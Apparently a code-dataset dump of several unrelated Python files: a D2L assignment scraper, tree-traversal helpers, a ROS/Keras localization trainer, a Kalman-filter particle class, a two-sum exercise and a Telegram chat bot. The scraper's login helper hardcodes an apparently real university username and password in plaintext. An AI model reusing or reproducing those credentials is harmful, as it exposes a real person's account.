BeautifulSoup(load_obj(\"tempassn\"),\"html.parser\")\r\n assignments = assnsoup.findAll(\"form\")[1].findAll(\"li\")\r\n assns,final_prods,x_axis,y_axis = {},{},[],[]# raw data,final polished data,classnames,dates\r\n # format the form tags scraped and add to dictionary with date as keys\r\n for assn in assignments:\r\n temp = list(filter(None, assn.text.split(\"\\n\")))\r\n try:\r\n assns[datetime.datetime.strptime(temp[3],\"%b %d, %Y %I:%M %p\")].append((temp[1],temp[2]))\r\n except:\r\n assns[datetime.datetime.strptime(temp[3],\"%b %d, %Y %I:%M %p\")] = [(temp[1],temp[2])]\r\n\r\n # iterates through all dates\r\n for day in list(assns.keys()):\r\n # add dates and init temporary variables\r\n y_axis.append(day)\r\n dayassns,final_prods[day] = {},{}\r\n # organize data\r\n for assi in assns[day]:\r\n if assi[0] not in x_axis:\r\n x_axis.append(assi[0])\r\n try:\r\n final_prods[day][assi[0]].append(assi[1])\r\n except:\r\n final_prods[day][assi[0]] = [(assi[1])]\r\n\r\n # initialize array for placing data into\r\n assn_array = np.zeros((len(y_axis),len(x_axis)),dtype=object)\r\n # more organizing and formatting of data\r\n for y_val in list(final_prods.keys()):\r\n for x_val in list(final_prods[y_val].keys()):\r\n for assin in final_prods[y_val][x_val]:\r\n if assn_array[y_axis.index(y_val)][x_axis.index(x_val)] == 0.0:\r\n assn_array[y_axis.index(y_val)][x_axis.index(x_val)] = assin\r\n else:\r\n assin = 
\"; \" + assin\r\n assn_array[y_axis.index(y_val)][x_axis.index(x_val)] += assin\r\n # remove null vals and package all data together into a dictionary\r\n values = [[v if v!= 0 else \"\" for v in vals] for vals in assn_array]\r\n self.assignments = {\"x_axis\":x_axis,\"y_axis\":y_axis,\"assignments\":values}\r\n\r\n # calls update_grades() on all of the classes saved\r\n def update_all_grades(self):\r\n # driver = self.d2l_driver()\r\n self.classes = [class_.update_grades() for class_ in self.classes]#driver\r\n\r\n \r\n def d2l_driver(self):\r\n chromedriver = ('C:\\\\Users\\\\Kaobe\\\\PycharmProjects\\\\School\\\\venv\\\\Include\\\\chromedriver.exe')\r\n driver = webdriver.Chrome(chromedriver)\r\n driver.get(\"https://d2l.msu.edu/d2l/loginh/\")\r\n driver.find_element_by_id(\"login-button\").click()\r\n driver.find_element_by_id(\"msu-id\").send_keys(\"osolukao\")\r\n driver.find_element_by_id(\"password\").send_keys(\"Kao4be123\")\r\n driver.find_element_by_class_name(\"msuit_brand_submit\").click()\r\n return driver\r\n\r\n def calc_assn_urgency(self):\r\n self.heat_data = schedanalysis(self).calculate_assn_urgency()\r\n\r\n\r\n\r\n","repo_name":"kaobeosolu78/Food_Stock_and_Class_Schedule","sub_path":"SchedContainer.py","file_name":"SchedContainer.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14791930048","text":"from typing import Any, Union\n\n\ndef traverse(tree: Union[dict, list], path: str, separator: str = \"/\") -> Any:\n \"\"\"The traverse function takes a tree and a path, and returns the value at\n that path. The tree can be either a list or dictionary, but the path must\n be valid for that type of tree.\n\n Example:\n .. code-block:: python\n\n >>> root = {\n >>> \"weekdays\": {\n >>> \"monday\": \"hello\",\n >>> \"tuesday\": \"hola\",\n >>> \"wednesday\": \"hallo\",\n >>> \"thursday\": \"bonjour\",\n >>> \"friday\": \"Здраво\",\n >>> },\n >>> \"fibonacci\": [\n >>> 1, 1, 2, 3, 5, 8, 13\n >>> ]\n >>> }\n\n >>> traverse(root, \"weekday/monday)\n \"hello\"\n\n >>> traverse(root, \"fibonacci/4\")\n 5\n\n Args:\n tree (:class:`~typing.Union`\\\\[:obj:`dict`, :obj:`list`]): The tree to\n traverse.\n path (:obj:`str`): Specify the path to the node that we want to access.\n separator (:obj:`str`, *optional*): Specify the path separator.\n Defaults to \"/\".\n\n Raises:\n ValueError: If index is not an integer.\n KeyError: If trying to access a non-existing nodes.\n\n Returns:\n :obj:`~typing.Any`: The node at that path.\n \"\"\"\n if tree is None:\n return None\n\n nodes: list[str] = path.split(separator)\n\n for node in nodes:\n if node == \"\":\n continue\n\n if isinstance(tree, list):\n try:\n tree = tree[int(node)]\n except ValueError as err:\n raise ValueError(\"Index must be an integer.\") from err\n continue\n\n if isinstance(tree, dict) and node in tree:\n tree = tree[node]\n continue\n\n raise KeyError(f\"Trying to access nonexistent nodes: {node}\")\n\n return tree\n\n\ndef bfs_attr_search(root: Any, attr: str) -> Any:\n \"\"\"\n Searches for attribute in object using the BFS algorithm.\n\n .. Note::\n attributes starting with '_' are ignored.\n\n Example:\n .. code-block:: python\n\n >>> def fun():\n ... 
pass\n >>> fun.hello = lambda x: x * 2\n >>> fun.hello.again = lambda x: x / 4\n >>> fun.hallo = lambda x: x - 7\n >>> fun.hallo.wieder = lambda x: x ** 3\n >>> fun.hola = lambda x: x + 2\n >>> fun.hola.otravez = lambda x: x * 8\n >>> bfs_attr_search(fun, \"again\")\n at ???>\n >>> bfs_attr_search(fun, \"again\")(20)\n 5.0\n\n Args:\n root (:obj:`~typing.Any`): Root of search.\n attr (:obj:`str`): Attribute name to search.\n\n Raises:\n AttributeError: When could not find the attribute.\n\n Returns:\n :obj:`~typing.Any`: The attribute with name attr found in search.\n \"\"\"\n\n queue: list = []\n visited: list = []\n\n queue.append(root)\n visited.append(id(root))\n\n while queue:\n obj = queue.pop()\n\n if hasattr(obj, attr):\n return getattr(obj, attr)\n\n try:\n objs = map(\n lambda attr: getattr(obj, attr),\n filter(lambda s: not s.startswith(\"_\"), vars(obj)),\n )\n except TypeError:\n continue\n\n for neighbor in objs:\n if id(neighbor) not in visited:\n queue.append(neighbor)\n visited.append(id(neighbor))\n\n raise AttributeError(f\"Could not find attribute {attr}\")\n","repo_name":"victorcebarros/korone","sub_path":"src/korone/utils/traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"41176477488","text":"#!/usr/bin/env python\r\nimport rospy\r\nfrom std_msgs.msg import String\r\nfrom geometry_msgs.msg import PoseStamped\r\nfrom geometry_msgs.msg import Point\r\nfrom sensor_msgs.msg import LaserScan\r\nfrom nav_msgs.msg import Odometry,OccupancyGrid\r\nfrom visualization_msgs.msg import Marker\r\nfrom visualization_msgs.msg import MarkerArray\r\nimport tf.transformations\r\nimport tf\r\n#import laser cast part\r\nfrom Laser import Laser, Map\r\nimport math\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Activation\r\n\r\nfrom keras.optimizers import SGD\r\nfrom copy import copy\r\nimport numpy as np\r\nimport os\r\nfrom keras.models import model_from_json\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.optimizers import Adam\r\noptim=Adam(lr=0.00001, beta_1=0.9, beta_2=0.999, epsilon=1e-08)\r\n\r\n#Network parameters\r\ndata_dim =362 \r\noutput_size=3 \r\nbatch_size=128\r\nepoch=1\r\n\r\ndef normalize_angle(theta):\r\n#Normalize phi to be between -pi and pi\r\n while theta> math.pi:\r\n\t theta = theta - 2*math.pi\r\n\r\n while theta<-math.pi:\r\n\t theta = theta + 2*math.pi\r\n\r\n return theta\r\n\r\ndef calculateScans(train_pose,delta_odom,laser):\r\n global data_laser_simul\r\n data_laser_simul=[]\r\n train_pose.pop()\r\n for i in range(len(train_pose)):\r\n update=train_pose[i]+delta_odom[i]\r\n predicted_laser=getLaserCast( update[0],update[1],update[2],laser)\r\n data_laser_simul.append(predicted_laser)\r\n\r\ndef mapWrapper(occ_map, width,height):\r\n #print(\"occ_map\",occ_map)\r\n occ_map=np.array(occ_map)\r\n for i in range(occ_map.shape[0]):\r\n if occ_map[i] >= 0:\r\n occ_map[i] = 1.0-(occ_map[i]/100.0)\r\n else:\r\n occ_map[i] = 1\r\n occ_map.resize(height, width)\r\n occ_map = occ_map.T\r\n return occ_map\r\n\r\ndef initCaster(wrappedMap,mapInfo):\r\n offset_x =mapInfo.origin.position.x\r\n offset_y =mapInfo.origin.position.y\r\n resolution = mapInfo.resolution\r\n\r\n #Parameters of the laser\r\n max_range = 50.0\r\n no_of_beams = 181\r\n min_angle = -math.pi/2.0\r\n resolution_angle = math.pi/(no_of_beams-1)\r\n noise_variance = 0.0#perfect\r\n\r\n map_obj = 
Map(mapInfo.height, mapInfo.width, offset_x, offset_y, resolution, wrappedMap)\r\n laser = Laser(max_range, min_angle, resolution_angle, no_of_beams, noise_variance, map_obj)\r\n return laser\r\n\r\ndef getLaserCast(robot_pos_x,robot_pos_y,robot_theta, laser):\r\n #relative position of the laser scanner to the center of the robot\r\n laser_pos_x = 1.2\r\n laser_pos_y = 0.0\r\n laser_angle = 0.0 * (math.pi/180.0)\r\n\r\n sin_theta = math.sin(robot_theta)\r\n cos_theta = math.cos(robot_theta)\r\n x = robot_pos_x + laser_pos_x * cos_theta - laser_pos_y*sin_theta\r\n y = robot_pos_y + laser_pos_x * sin_theta + laser_pos_y*cos_theta\r\n theta = robot_theta + laser_angle\r\n theta=normalize_angle(theta)\r\n\r\n ranges = laser.scan(x,y,theta)\r\n return ranges\r\n\r\n\r\n\r\n\r\ngridMap=OccupancyGrid()\r\ncallback_front_laser=[]\r\ncallback_pose_new=PoseStamped()\r\nodom=Odometry()\r\n#training data\r\ndata_pose=[]\r\ndata_laser=[]\r\ndata_laser_simul=[]\r\ndata_odom=[]\r\n\r\ndef get_data():\r\n global callback_front_laser\r\n global callback_pose_new\r\n global data_pose\r\n global data_laser\r\n global odom\r\n global data_odom\r\n\r\n # get pose\r\n temp=[None]*3\r\n temp[0]=copy(callback_pose_new.pose.position.x)\r\n temp[1]=copy(callback_pose_new.pose.position.y)\r\n quaternion = (\r\n callback_pose_new.pose.orientation.x,\r\n callback_pose_new.pose.orientation.y,\r\n callback_pose_new.pose.orientation.z,\r\n callback_pose_new.pose.orientation.w)\r\n\r\n euler = tf.transformations.euler_from_quaternion(quaternion)\r\n temp[2]=copy(euler[2])\r\n data_pose.append(copy(temp))\r\n #get laser front\r\n data_laser.append(copy(callback_front_laser))\r\n\r\n #odom update\r\n odom_current=[None]*3\r\n quaternion = (\r\n odom.pose.pose.orientation.x,\r\n odom.pose.pose.orientation.y,\r\n odom.pose.pose.orientation.z,\r\n odom.pose.pose.orientation.w)\r\n\r\n euler = tf.transformations.euler_from_quaternion(quaternion)\r\n odom_current[0] =copy(odom.pose.pose.position.x)\r\n odom_current[1]=copy(odom.pose.pose.position.y)\r\n odom_current[2]=euler[2]\r\n data_odom.append(odom_current)\r\n\r\ndef callback_map(data):\r\n global gridMap\r\n gridMap=data\r\n \r\n\r\ndef callback_front(data):\r\n global callback_front_laser\r\n callback_front_laser=data.ranges\r\n\r\n\r\n\r\ndef callback_pose(data):\r\n global callback_pose_new\r\n callback_pose_new=data\r\n \r\n \r\ndef callback_odom(data):\r\n global odom\r\n odom=data\r\n\r\n\r\ndef both():\r\n global data_laser\r\n global data_laser_simul\r\n global data_pose\r\n global odom\r\n global gridMap\r\n \r\n rospy.init_node('correction_net_train', anonymous=True)\r\n #subscribe\r\n rospy.Subscriber('scan_front', LaserScan, callback_front)\r\n rospy.Subscriber('true_pose', PoseStamped, callback_pose)\r\n rospy.Subscriber('odom', Odometry, callback_odom)\r\n rospy.Subscriber('/map', OccupancyGrid, callback_map)\r\n rate = rospy.Rate(10) # 10hz\r\n rospy.sleep(2.)\r\n \r\n \r\n time_last_update = rospy.Time.now()\r\n update_weights_freq= rospy.Duration(10).to_sec()\r\n\r\n wrappedMap= mapWrapper(gridMap.data,gridMap.info.width, gridMap.info.height)\r\n laser=initCaster(wrappedMap, gridMap.info)\r\n while not rospy.is_shutdown():\r\n rate.sleep()\r\n diff_time=rospy.Time.now()-time_last_update# frequency of update\r\n get_data()\r\n if(diff_time.to_sec()>=update_weights_freq):\r\n time_last_update=rospy.Time.now()\r\n train_front=copy(data_laser)\r\n train_pose=copy(data_pose)\r\n train_odom=copy(data_odom)\r\n #generate laser scans from odom position\r\n\r\n 
\r\n delta_odom=np.diff(train_odom,axis=0)\r\n delta_pose=np.diff(train_pose,axis=0)\r\n print(\"delta_odom\",delta_odom.shape)\r\n print(\"delta_pose\",delta_pose.shape)\r\n train_front.pop(0)\r\n\r\n calculateScans(train_pose,delta_odom,laser)\r\n delta=delta_pose-delta_odom\r\n\r\n print(\"train_front\", len(train_front))\r\n print(\"train_simul\", len(data_laser_simul))\r\n\r\n data=np.hstack((data_laser_simul,train_front))\r\n X_train=np.reshape(data, (data.shape[0],1,1, data_dim))\r\n print('X_train',X_train.shape)\r\n y_train=np.array( delta)\r\n print('y_train',y_train.shape)\r\n netname=\"CorrectionNet\"\r\n if not os.path.isfile(netname+'.h5') or not os.path.isfile(netname+'.json'):\r\n print('NO NETWORK')\r\n else:\r\n print('Loading existing network')\r\n model = model_from_json(open(netname+'.json').read())\r\n model.load_weights(netname+'.h5')\r\n\r\n #compile loaded model\r\n model.compile(loss='mse',optimizer=optim)\r\n print('Start learning...')\r\n model.fit(X_train, y_train, nb_epoch=epoch,batch_size=batch_size)\r\n model.save_weights(netname+'.h5', overwrite=True)\r\n # spin() simply keeps python from exiting until this node is stopped\r\n rospy.spin()\r\n\r\nif __name__ == '__main__':\r\n print('Start retraining')\r\n both()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Dtananaev/localization","sub_path":"correction_net/scripts/correction_net_train.py","file_name":"correction_net_train.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"76"} +{"seq_id":"17482718149","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 17 19:13:33 2018\n\n@author: alexandre\n\"\"\"\n\nfrom roblib import *\nfrom PyUnityVibes.UnityFigure import UnityFigure\n\ndef kalman_predict(xup,Gup,u,Γα,A):\n Γ1 = A @ Gup @ A.T + Γα\n x1 = A @ xup + u \n return(x1,Γ1) \n\ndef kalman_correc(x0,Γ0,y,Γβ,C):\n S = C @ Γ0 @ C.T + Γβ \n if det(S) != 0 :\n K = Γ0 @ C.T @ inv(S)\n else : \n K = zeros((3,2))\n ytilde = y - C @ x0 \n Gup = (eye(len(x0))-K @ C) @ Γ0 \n xup = x0+ K@ytilde \n return(xup,Gup) \n \ndef kalman(x0,Γ0,u,y,Γα,Γβ,A,C):\n xup,Gup = kalman_correc(x0,Γ0,y,Γβ,C)\n x1,Γ1=kalman_predict(xup,Gup,u,Γα,A)\n return(x1,Γ1)\n\n############################################\nclass Particule:\n \"\"\"\n Particule class\n \"\"\"\n def __init__(self,X,U,cov, figure):\n \"\"\"\n Constructor\n\n Parameters\n ----------\n X: state vector\n X[0]:x coordinate\n X[1]:y coordinate\n X[2]:v speed\n\n U: input vector\n U[0]:u speed input\n U[1]:theta heading input\n\n cov: matrix 3*3\n covariance matrix\n \"\"\"\n\n self.Xchap = X\n self.X = X\n self.U = U\n self.cov = cov\n self.theta = 0\n self.auv = figure.create(UnityFigure.OBJECT_3D_SUBMARINE, 0, 0, 0, dimX=5, dimY=5, dimZ=5)\n\n\n\n def __str__(self):\n \"\"\"\n Allows to print the Particule object\n \"\"\"\n X = self.X.flatten()\n U = self.U.flatten()\n return 'X: \\n x coordinate > {}\\n y coordinate > {}\\n speed > {}\\n\\n U: \\n speed input > {}\\n theta heading input > {}\\n\\n cov:\\n {}'.format(self.X[0], self.X[1], self.X[2], self.U[0], self.U[1], self.cov)\n\n\n def __repr__(self):\n X = self.X.flatten()\n U = self.U.flatten()\n return \"Vecteur etat : [{},{},{}]\".format(self.X[0],self.X[1],self.X[2]) + \"\\n Matrice de covariance : {}\".format(self.cov) + \"\\n Vecteur d'entree : [{},{}]\".format(self.U[0],self.U[1]) # {:.2f} notation pour n'afficher que deux chiffres après la virgule\n\n\n def display(self,col):\n \"\"\"\n Allows to display the 
Particule object through matplotlib\n \"\"\"\n X = self.X.flatten()\n U = self.U.flatten()\n draw_arrow(X[0],X[1],U[1],0.1,col)\n\n def appendFrame(self,anim): #PyUnityVibes\n anim.appendFrame(self.auv, x=self.X[0,0], y=0.0, z=self.X[1,0], rx=0, ry=0, rz=self.U[1,0])\n\n def controle(self,t,w):\n \"\"\"\n Control equation of the AUV\n \"\"\"\n k = 1\n xchap = self.Xchap\n x = self.X\n U = self.U\n U[1,0] = k*(w-self.theta)\n return U\n\n def f(self):\n \"\"\"\n State equation of the AUV\n\n alpha : bruit gaussien sur x,y et v\n \"\"\"\n \n theta = self.U[1,0]\n u = self.U[0,0]\n\n sigma_x, sigma_y,sigma_v = 0.1,0.1,0.15\n G_alpha = np.diag([sigma_x**2,sigma_y**2,sigma_v**2])\n\n alpha = np.zeros((3,1))\n alpha[0,0] = np.random.randn(1,1)*sigma_x\n alpha[1,0] = np.random.randn(1,1)*sigma_y\n alpha[2,0] = np.random.randn(1,1)*sigma_v\n\n\n A = array([[0,0,cos(theta)],[0,0,sin(theta)],[0,0,-1]])\n return A.dot(self.X) + array([[0],[0],[u]]) + alpha\n\n\n def step(self,t,dt):\n if t > 60:\n C = array([[1,0,0],[0,1,0]])\n G_beta = diag([[0.45**2],[0.45**2]])\n else :\n C = zeros((2,3))\n G_beta = zeros((2,2))\n\n sigma_x, sigma_y,sigma_v = 0.1,0.1,0.15\n G_alpha = np.diag([sigma_x**2,sigma_y**2,sigma_v**2])\n\n\n self.X = self.X + dt*self.f()\n \n \n U = self.U.flatten()\n \n A = array([[1,0,cos(self.theta)],[0,1,sin(self.theta)],[0,0,-1]])\n self.Xchap,self.cov = kalman(self.X,self.cov,array([[0],[0],[U[0]]]),G_beta ,G_alpha,G_beta,A,C)\n self.U = self.controle(t,pi/2)\n\n\n\n\n\nif __name__ == \"__main__\":\n\n X = array([[1],[10],[2]])\n Xchap = X\n U = array([[3],[pi/4]])\n cov = eye(3)\n theta = 0\n part = Particule(X,Xchap,U,cov,theta)\n print(part)\n figure()\n part2 = part\n part2.step(10,0.1)\n print(part2)\n part2.display(\"red\")\n part2.step(12,0.1)\n part2.display(\"green\")","repo_name":"clavieev/Predictor","sub_path":"Filtre_particulaire/Python/include/particule.py","file_name":"particule.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"33009287932","text":"# Given an array of integers, find two numbers such that they add up to a specific target number.\n# The function twoSum should return indices of the two numbers such that they add up to the target,\n# where index1 must be less than index2. 
Please note that your returned answers (both index1 and index2)\n# are not zero­based.\n#\n# You may assume that each input would have exactly one solution.\n#\n# Input: numbers={2, 7, 11, 15}, target=9\n#\n# Output: index1=1, index2=2\n\n#Solution1:\n#Complexity n^2\n\ndef twoSum1(numbers, target):\n for index1, num1 in enumerate(numbers):\n for index2, num2 in enumerate(numbers[index1+1:]):\n\n if num1+num2 == target:\n #print(index1+1, index1+2+index2)\n print(f\"index1={index1+1}, index2={index1+2+index2}\")\n break\n\n\n#Solution2:\n#Complexity nlogn\n\n\ndef twoSum2(numbers, target):\n print(\"Blank\")\n\n\ndef main():\n numbers=[8,5,1,13]\n target=9\n twoSum1(numbers, target)\n twoSum2(numbers, target)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"moitreebasu1990/Programming_exercises_2020","sub_path":"week1/src/week1_prob1.py","file_name":"week1_prob1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4522015700","text":"# -*- coding: utf-8 -*-\nimport config as cfg\nimport text_processing as tp\nimport mumu\nimport telebot\nimport time\nimport datetime\nimport database as db\nimport random\nimport event_timer as evt\nimport webhook\n\nrandom.seed(time.clock())\n\nbot = telebot.TeleBot(cfg.token)\n\n# week_day = datetime.datetime.today().weekday()\n\n# определяем дефолтное время\ncfg.dinner_time = cfg.dinner_default_time\ncfg.dinner_time = datetime.timedelta(hours=cfg.dinner_time[0], minutes=cfg.dinner_time[1])\ncfg.show_din_time = str(cfg.dinner_time)[:-3]\n\n# таймеры\n# evt.dinner_time_timer(bot)\nevt.one_hour_timer(bot)\nevt.check_metadata(bot)\n\n\n# приветствие\n@bot.message_handler(commands=['start', 'help'])\n@cfg.loglog(command='start/help', type='message')\ndef send_welcome(message):\n cid = message.chat.id\n bot.send_message(cid, cfg.hello_msg)\n\n\n# меню в муму\n@bot.message_handler(commands=['chto_v_mumu'])\n@cfg.loglog(command='chto_v_mumu', type='message')\ndef send_mumu(message):\n cid = message.chat.id\n week_day = datetime.datetime.today().weekday()\n lunches = mumu.lunches(week_day)\n\n bot.send_message(cid, lunches[0][0])\n bot.send_message(cid, lunches[0][1])\n bot.send_message(cid, lunches[1][0])\n bot.send_message(cid, lunches[1][1])\n\n\n# регистрируем человека в списке участников чата по его запросу\n@bot.message_handler(commands=['subscribe'])\n@cfg.loglog(command='subscribe', type='message')\ndef subscribe(message):\n cid = message.chat.id\n user = message.from_user\n res = db.insert_into_participants(cid, user)\n if res == -1:\n bot.send_message(cid, cfg.err_subscribe_msg)\n else:\n bot.send_message(cid, cfg.subscribe_msg)\n\n\n# удаляем человека из списка участников чата по его запросу\n@bot.message_handler(commands=['unsubscribe'])\n@cfg.loglog(command='unsubscribe', type='message')\ndef unsubscribe(message):\n cid = message.chat.id\n user_id = message.from_user.id\n db.delete_from_participants(cid, user_id)\n bot.send_message(cid, cfg.unsubscribe_msg)\n\n\n# регистрируем чат в рассылки на сообщения ботом\n@bot.message_handler(commands=['admin_subscribe_for_messages'])\n@cfg.loglog(command='admin_subscribe_for_messages', type='message')\ndef admin_subscribe_for_dinner(message):\n cid = message.chat.id\n res = db.insert_into_chatID(cid)\n if res == -1:\n bot.send_message(cid, cfg.err_subscribe_msg_chatId)\n else:\n bot.send_message(cid, cfg.subscribe_msg_chatId)\n\n\n# удаляем чат из рассылки на сообщения 
ботом\n@bot.message_handler(commands=['admin_unsubscribe_for_messages'])\n@cfg.loglog(command='admin_unsubscribe_for_messages', type='message')\ndef admin_unsubscribe_for_dinner(message):\n cid = message.chat.id\n db.delete_from_chatID(cid)\n bot.send_message(cid, cfg.unsubscribe_msg_chatId)\n\n\n# призвать всех\n@bot.message_handler(commands=['all'])\n@cfg.loglog(command='all', type='message')\ndef ping_all(message):\n cid = message.chat.id\n user_id = message.from_user.id\n users = db.sql_exec(db.sel_all_text, [cid])\n call_text = 'Эй, @all: '\n # бежим по всем юзерам в чате\n for i in users:\n # если юзер не тот, кто вызывал all, уведомляем его\n if i[1] != user_id:\n call_text = call_text + '@' + str(i[4]) + ' '\n\n # проверка на /all@ddsCrewBot\n if (message.text[0:15] == '/all@ddsCrewBot'):\n bot.send_message(cid, call_text.strip() + message.text[15:])\n else:\n bot.send_message(cid, call_text.strip() + message.text[4:])\n\n\n# подбросить монетку\n@bot.message_handler(commands=['coin'])\n@cfg.loglog(command='coin', type='message')\ndef throw_coin(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.precomand_text))\n time.sleep(1)\n\n bot.send_message(cid, random.choice(cfg.coin_var))\n\n\n# подбросить кубик\n@bot.message_handler(commands=['dice'])\n@cfg.loglog(command='dice', type='message')\ndef throw_dice(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.precomand_text))\n time.sleep(1)\n\n if len(message.text.split()) == 2 and message.text.split()[1].isdigit():\n bot.send_message(cid, random.randint(1, int(message.text.split()[1])))\n else:\n bot.send_message(cid, random.choice(cfg.dice_var))\n\n\n# магический шар\n@bot.message_handler(commands=['ball'])\n@cfg.loglog(command='ball', type='message')\ndef magic_ball(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.precomand_ball))\n time.sleep(1)\n\n bot.reply_to(message, random.choice(cfg.ball_var))\n\n\n# показать время обеда\n@bot.message_handler(commands=['dinner'])\n@cfg.loglog(command='dinner', type='message')\ndef show_dinner_time(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.dinner_text) + cfg.show_din_time)\n\n\n# показать/оставить штрафы\n@bot.message_handler(commands=['penalty'])\n@cfg.loglog(command='penalty', type='message')\ndef penalty(message):\n time_now = datetime.datetime.now()\n cid = message.chat.id\n pen = db.sql_exec(db.sel_all_penalty_time_text, [cid])\n\n cmd = message.text.split()\n flg = 0\n\n if (len(cmd) == 3) and (not cmd[1].isdigit()) and (cmd[2].isdigit()):\n for user in pen:\n if user[0] == cmd[1][1:]:\n flg = 1\n\n if user[2] == message.from_user.id:\n bot.send_message(cid, 'Нельзя ставить штрафы самому себе!')\n break\n\n penalty_time = abs(int(cmd[2]))\n if penalty_time != 0:\n if penalty_time >= 25:\n bot.send_message(cid, 'Я не ставлю штрафы больше чем на 25 минут!')\n else:\n bot.send_message(cid, 'Поставил штраф ' + str(cmd[1]) + ' ' +\n str(penalty_time) + ' мин')\n\n # добавляем строку штрафа в метаданные\n delta = datetime.timedelta(hours=24)\n expire_date = time_now + delta\n\n db.sql_exec(db.ins_operation_meta_text,\n [cfg.max_id_rk, 0, cid, user[2], penalty_time,\n str(time_now)[:-7], str(expire_date)[:-7], 1])\n cfg.max_id_rk += 1\n else:\n bot.send_message(cid, 'Я не ставлю штрафы 0 минут!')\n break\n\n if flg == 0:\n bot.send_message(cid, 'Я не нашёл ' + str(cmd[1]) + ' в базе...\\n' +\n 'Проверь написание ника!\\n' +\n 'Ну, или может быть этот этот человек ещё не подписался?')\n 
else:\n pen_msg = 'Штрафы на сегодня:\\n'\n pen_msg_flg = 0\n for user in pen:\n if int(user[1]) != 0:\n pen_msg += str(user[0]) + ' — ' + str(user[1]) + ' мин\\n'\n pen_msg_flg = 1\n\n if pen_msg_flg == 1:\n bot.send_message(cid, pen_msg)\n else:\n bot.send_message(cid, random.choice(cfg.penalty_empty_text))\n\n\n# раскомментировать, чтобы узнать file_id стикера\n# @bot.message_handler(content_types=[\"sticker\"])\n# def get_sticker(message):\n# print(message.sticker.file_id)\n# cid = message.chat.id\n# bot.send_sticker(cid, random.choice(cfg.sticker_var))\n\n\n@bot.message_handler(content_types=[\"text\"])\n@cfg.loglog(command='text_parser', type='message')\ndef text_parser(message):\n week_day = datetime.datetime.today().weekday()\n # нужно брать дату из даты сообщения\n hour_msg = time.localtime(message.date).tm_hour\n # текущее время, может пригодиться\n # hour_now = time.localtime().tm_hour\n cid = message.chat.id\n user_id = message.from_user.id\n\n if cid in cfg.subscribed_chats:\n # # лол кек ахахаха детектор\n if tp.lol_kek_detector(message.text) is True:\n print('##########', datetime.datetime.now(), 'lol_kek_detector')\n\n if random.random() >= 0.8:\n bot.send_sticker(cid, random.choice(cfg.sticker_var))\n print('Sent!')\n\n # # голосование за обед\n din_elec = tp.dinner_election(message.text)\n # ТОЛЬКО ДЛЯ ТЕСТИРОВАНИЯ!!!\n # if din_elec is not False:\n if week_day not in (5, 6) and hour_msg < 12 and din_elec is not False:\n print('##########', datetime.datetime.now(), 'dinner_election')\n\n print('Din_elec =', din_elec)\n user = db.sql_exec(db.sel_election_text, [cid, user_id])\n if len(user) == 0:\n bot.reply_to(message, cfg.err_vote_msg)\n else:\n penalty_time = int(user[0][3])\n\n final_elec_time = 0\n sign = 1\n\n if din_elec != 0:\n sign = (din_elec / abs(din_elec))\n final_elec_time = din_elec - sign * penalty_time\n\n if abs(final_elec_time) > 25:\n final_elec_time = sign * 25\n\n if (sign * final_elec_time < 0):\n final_elec_time = 0\n\n final_elec_time = datetime.timedelta(minutes=final_elec_time)\n cfg.dinner_time += final_elec_time\n\n additional_msg = ''\n if penalty_time != 0:\n additional_msg = 'с учётом штрафов '\n\n # голосование или переголосование\n if int(user[0][2]) == 0:\n bot.reply_to(message, cfg.vote_msg + additional_msg + str(cfg.dinner_time)[:-3])\n else:\n final_elec_time = 0\n prev_din_elec = int(user[0][2])\n sign = 1\n\n if prev_din_elec != 0:\n sign = (prev_din_elec / abs(prev_din_elec))\n final_elec_time = prev_din_elec - sign * penalty_time\n\n if abs(final_elec_time) > 25:\n final_elec_time = sign * 25\n\n if (sign * final_elec_time < 0):\n final_elec_time = 0\n\n final_elec_time = datetime.timedelta(minutes=final_elec_time)\n cfg.dinner_time -= final_elec_time\n bot.reply_to(message, cfg.revote_msg + additional_msg + str(cfg.dinner_time)[:-3])\n\n cfg.show_din_time = str(cfg.dinner_time)[:-3]\n print('Время обеда', cfg.show_din_time)\n db.sql_exec(db.upd_election_elec_text, [din_elec, cid, user_id])\n\n # # понеделбник - денб без мягкого знака\n if week_day == 0 and hour_msg < 12 and tp.soft_sign(message.text) is True:\n print('##########', datetime.datetime.now(), 'soft_sign')\n\n bot.reply_to(message, 'ШТРАФ')\n print('ШТРАФ')\n\n print('##########', datetime.datetime.now(), '\\n')\n\n\nprint('here')\nwebhook.webhook(bot)\nprint('here again')\n","repo_name":"causelovem/ddsCrewBot","sub_path":"last 
version/botProd.py","file_name":"botProd.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
